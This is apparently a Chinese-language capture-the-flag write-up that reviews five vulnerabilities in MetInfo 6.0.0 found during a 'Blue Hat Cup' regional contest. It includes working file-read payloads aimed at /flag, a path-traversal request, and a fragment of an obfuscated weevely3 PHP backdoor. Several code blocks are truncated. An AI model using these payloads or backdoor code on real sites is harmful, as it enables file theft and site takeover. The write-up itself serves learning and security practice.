很幸运参加了第二届“蓝帽杯”的分区赛,这也是参加的第一场线下赛,体验非常好,学到了很多东西,也见识到了大佬们的姿势。
全程在防守,审出漏洞也看不出来,不会用,要学的还有太多了。
参加的是浙江赛区的比赛,赛后重新梳理了一下web题目。
题目是 Metinfo6.0.0,一共有5个漏洞,4个主办方加进去的,还有一个Metinfo6.0.0任意文件读取漏洞。
1、 后台seo任意文件读取漏洞
路径:\admin\seo\htm.php
源码:
1 | if(isset($_GET['seourl'])){ |
1 | payload: |
2、 weevely3后门
路径:\app\system\news\web\news.class.php
源码:
1 | $t = 'pre2Fss(@2Fx(@b2Fase64_deco2F2Fde(preg2F_r2Fepl2Face(array("/_/",2F"2F/-/"),array("/2F","2F+")2'; |
这是 一个PHP混淆后门,混淆的特别乱,将原来的代码打乱顺序混淆。
经过分析,混淆进行的操作,先按照 $X . $q . $c . $F . $K . $N . $O . $d . $s . $l . $t . $U . $m 拼接字符串,然后删除2F,去除$l 中的Th 利用create_function()创建$l函数
进行反混淆和美化:
3、任意文件读取漏洞
路径:\app\system\img\web\img.class.php
源码:
1 | public function doshowimg(){ |
get 方式提交images、a、b 其中 get b 后边是tents b=构成 file_get_contens
1 | payload: ?images=1&b=file_get_con&a=/flag |
4、任意文件读取漏洞
路径:\app\system\include\ module\old_thumb.class.php
关键代码:
1 | payload:/include/thumb.php?dir=http/...././/...././/...././/...././/...././/flag |
5、 找回密码处任意文件上传漏洞
1 | POST ////////admin/index.php? |
最后有一个漏洞看了wp才知道的,通过这次比赛更加证明了自己的菜,而且不是一般的菜,要学的东西还有很多,漏洞中的weevely3后门和Metinfo6.0.0任意文件读取漏洞还是得单独总结复现一下,另外要积累各种漏洞存在的形式,像是各种混淆后门、变形木马、任意文件读取的方式等。
学喜欢的,做想做的,加油!